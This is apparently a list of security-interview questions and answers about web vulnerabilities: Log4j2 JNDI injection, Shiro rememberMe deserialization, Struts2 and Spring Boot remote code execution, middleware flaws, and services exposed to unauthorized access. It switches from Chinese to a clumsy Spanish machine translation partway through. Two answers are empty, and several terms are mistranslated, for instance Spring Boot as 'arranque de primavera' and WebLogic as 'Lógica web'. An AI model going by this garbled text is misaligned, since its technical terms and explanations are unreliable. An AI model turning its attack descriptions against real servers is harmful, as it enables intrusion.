23、威胁平台根据cookie怎么判断是什么漏洞?
答案:
漏洞问题
问题1:对框架漏洞的了解?
答案:
问题2:log4j2原理和利⽤⽅式;
答案:由于Log4j2组件在处理程序⽇志记录时存在JNDI注⼊缺陷,未经授权的攻击者利⽤该漏洞,可向⽬标服务器发送精⼼构造的恶意数据,触发Log4j2组件解析缺陷,实现⽬标服务器的任意代码执⾏,获得⽬标服务器权限。
问题3:Apache shiro漏洞;
答案:Shiro反序列化漏洞的原理:为了让浏览器或服务器重启后⽤户不丢失登录状态,Shiro ⽀持将持久化信息序列化并加密后保存在 Cookie 的 rememberMe 字段中,下次读取时进⾏解密再反序列化。但是在 Shiro 1.2.4 版本之前内置了⼀个默认且固定的加密 Key,导致攻击者可以伪造任意的 rememberMe Cookie,进⽽触发反序列化漏洞。 判断这个漏洞的话主要看他们的响应头⾥⾯有没有rememberme;
问题4:struts2漏洞;
答案:该漏洞在两种情况下存在,第⼀,当xml配置中未设置namespace 值,且上层动作配置(action(s) configurations)中未设置或使⽤通配符namespace值时,可能导致远程代码执⾏漏洞的发⽣。第⼆,使⽤未设置 value和action值的url标签,且上层动作配置中未设置或使⽤通配符namespace值,同样可能导致远程代码执⾏。
问题5:springboot漏洞;
Respuesta: Spring es un componente muy común en la web de Java y, naturalmente, es un punto caliente para la investigación. Las lagunas más útiles son principalmente la deserialización de Spring Boot Actuators.
Principio de vulnerabilidad:
Hay un error en el valor del parámetro de procesamiento de arranque de primavera. El proceso ingresa a la clase org.springframework.util.PropertyPlaceholderHelper. En este momento, el valor del parámetro en la URL se analizará recursivamente utilizando el método parseStringValue. El contenido rodeado por ${} será org.springframework.boot El método resolvePlaceholder de la clase autoconfigure.web.ErrorMvcAutoConfiguration se analiza y ejecuta como una expresión SpEL, lo que provoca una vulnerabilidad RCE;
Pregunta 6: ¿ Cuáles son los middlewares comunes y cuáles son las vulnerabilidades comunes ?
Respuesta: IIS: vulnerabilidad de análisis, enumeración de nombres de archivos cortos, ejecución remota de código, vulnerabilidad PUT;
Apache: análisis de vulnerabilidades, recorrido de directorios, vulnerabilidades de deserialización de Shiro;
Nginx: análisis de vulnerabilidades, recorrido de directorio, inyección CRLF, recorrido de directorio;
Tomcat: directorio de muestra, ejecución remota de código, recorrido de ruta inversa, implementación de archivos backend de guerra;
Jboss: deserialización, implementación de archivos de posguerra;
Lógica web: deserialización, carga de archivos arbitrarios SSRF;
Pregunta 7: ¿Cuáles son las vulnerabilidades comunes de acceso no autorizado ?
Respuesta: Acceso no autorizado a Active MQ
Acceso no autorizado a Atlassian Crowd
Acceso no autorizado a CouchDB
Acceso no autorizado a Docker
Acceso no autorizado a Dubbo
Acceso no autorizado del druida
Acceso no autorizado a Elasticsearch
Acceso no autorizado a FTP
Acceso no autorizado a Hadoop
Acceso no autorizado a JBoss
Acceso no autorizado a Jenkins
Acceso no autorizado a Jupyter Notebook
Acceso no autorizado a Kibana
Acceso no autorizado al servidor Kubernetes Api
Acceso no autorizado a LDAP
Acceso no autorizado a MongoDB
Acceso no autorizado a Memcached
Acceso no autorizado a NFS
Acceso no autorizado a Rsync
Acceso no autorizado a Redis